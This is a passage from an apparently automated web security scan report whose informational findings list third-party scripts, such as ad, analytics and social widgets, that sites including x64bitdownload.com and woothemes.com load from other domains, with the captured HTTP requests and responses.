Last-Modified: Mon, 24 Jan 2011 23:24:38 GMT
X-Server-Name: dv-c1-r2-u24-b14
Content-Type: text/html;charset=utf-8
Expires: Tue, 25 Jan 2011 00:09:42 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 25 Jan 2011 00:09:42 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 255776

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ope
...[SNIP]...
</script>
<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...
</script>
<script src="http://platform.twitter.com/widgets.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script src="http://www.nbcudigitaladops.com/hosted/global.js"></script>
...[SNIP]...

21.1312. http://www.thefeast.com/boston/shopping/FEAST-SHOP-BOS-A-Puffer-Never-Looked-So-Cute-114479944.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.thefeast.com
Path:	/boston/shopping/FEAST-SHOP-BOS-A-Puffer-Never-Looked-So-Cute-114479944.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.recaptcha.net/js/recaptcha_ajax.js
http://platform.twitter.com/widgets.js
http://www.nbcudigitaladops.com/hosted/global.js

Request

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 24 Jan 2011 23:24:38 GMT
X-Server-Name: sj-c14-r8-u31-b7
Content-Type: text/html;charset=utf-8
Expires: Tue, 25 Jan 2011 00:09:35 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 25 Jan 2011 00:09:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 282213

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ope
...[SNIP]...
</script>
<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...
</script>
<script src="http://platform.twitter.com/widgets.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script src="http://www.nbcudigitaladops.com/hosted/global.js"></script>
...[SNIP]...

21.1313. http://www.thisnext.com/pick/new/submit/sociable/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.thisnext.com
Path:	/pick/new/submit/sociable/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.1/dragdrop.js
http://edge.quantserve.com/quant.js
http://partner.googleadservices.com/gampad/google_service.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://static.fmpub.net/site/thisnext

Request

GET /pick/new/submit/sociable/?url={u}&name={t} HTTP/1.1
Host: www.thisnext.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:39:06 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: private
P3P: CP="CAO DSP COR CURi ADMi DEVi IVAi IVDi CONi HISi OUR IND ONL STA",policyref="/w3c/p3p.xml", CP="CAO DSP COR CURi ADMi DEVi IVAi IVDi CONi HISi OUR IND ONL STA",policyref="/w3c/p3p.xml"
Content-Type: text/html; charset=utf-8
Set-Cookie: session=046f9657edcc992948bb669f4e6686bd; path=/
Set-Cookie: browser=173.193.214.243.1295930346514828; path=/; expires=Fri, 22-Jan-21 04:39:06 GMT
Connection: close
Content-Length: 19298

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"

...[SNIP]...
</script>

           <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.1/dragdrop.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/thisnext'></script>
...[SNIP]...

21.1314. http://www.tradeonlytoday.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tradeonlytoday.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://secure-us.imrworldwide.com/v53.js

Request

GET / HTTP/1.1
Host: www.tradeonlytoday.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.1315. http://www.walnecks.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.walnecks.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
http://d.yimg.com/mi/ywa.js

Request

GET / HTTP/1.1
Host: www.walnecks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:10:51 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Set-Cookie: location=%5B%7B%22ZIP_CODE%22%3A%2275207%22%2C%22STATE_NAME%22%3A%22Texas%22%2C%22CITY_NAME%22%3A%22Dallas%22%7D%5D; expires=Wed, 25-Jan-2012 00:10:51 GMT
Connection: close
Content-Type: text/html
Content-Length: 64629

<!DOCTYPE html>
<html>
<head>
   <title>Classic Motorcycles - Antique and Vintage Motorcycles for Sale - Walnecks.com</title>
   <meta http-equiv="Cache-Control" content="no-cache
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...

21.1316. http://www.woothemes.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.woothemes.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://twitter.com/javascripts/blogger.js
http://twitter.com/statuses/user_timeline/woothemes.json?callback=twitterCallback2&count=1
http://www.google.com/cse/brand?form=cse-search-box-footer&lang=en

Request

GET / HTTP/1.1
Host: www.woothemes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:11:04 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.3.2
Last-Modified: Tue, 25 Jan 2011 00:10:45 GMT
Vary: Cookie
X-Pingback: http://www.woothemes.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 25957

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head profile="http://gmpg.org/xfn/1
...[SNIP]...
</div> <script type="text/javascript" src="http://twitter.com/javascripts/blogger.js"></script> <script type="text/javascript" src="http://twitter.com/statuses/user_timeline/woothemes.json?callback=twitterCallback2&count=1"></script>
...[SNIP]...
</form> <script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box-footer&lang=en"></script>
...[SNIP]...

21.1317. http://www.x64bitdownload.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:20:28 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:30:39 GMT
Cache-Control: max-age=600
Pragma: cache
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 64487

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1318. http://www.x64bitdownload.com/64-bit-archive-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-archive-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:29 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:09:54 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22archive%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22archive%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 93426

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1319. http://www.x64bitdownload.com/64-bit-assembling-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-assembling-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:38:36 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:48:47 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22assembling%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22assembling%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 72783

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1320. http://www.x64bitdownload.com/64-bit-atom-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-atom-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:50:19 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:00:20 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22atom%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22atom%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 89319

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1321. http://www.x64bitdownload.com/64-bit-audio-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-audio-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:39:29 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:49:34 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22audio%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22audio%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 96673

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1322. http://www.x64bitdownload.com/64-bit-automatic-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-automatic-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:40:47 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:50:59 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22automatic%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22automatic%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1323. http://www.x64bitdownload.com/64-bit-autoposter-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-autoposter-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:36:50 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:47:05 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22autoposter%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22autoposter%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36293

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1324. http://www.x64bitdownload.com/64-bit-binaries-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-binaries-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:52:04 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:02:17 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22binaries%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22binaries%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 88854

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1325. http://www.x64bitdownload.com/64-bit-binary-downloader-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-binary-downloader-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:52:31 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:02:42 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A17%3A%22binary-downloader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A17%3A%22binary+downloader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 35748

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1326. http://www.x64bitdownload.com/64-bit-binary-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-binary-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:36:29 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:46:34 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22binary%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22binary%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91309

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1327. http://www.x64bitdownload.com/64-bit-board-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-board-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:54:51 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:05:03 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22board%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22board%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 88225

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1328. http://www.x64bitdownload.com/64-bit-boards-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-boards-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:54:59 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:05:00 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22boards%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22boards%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 86911

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

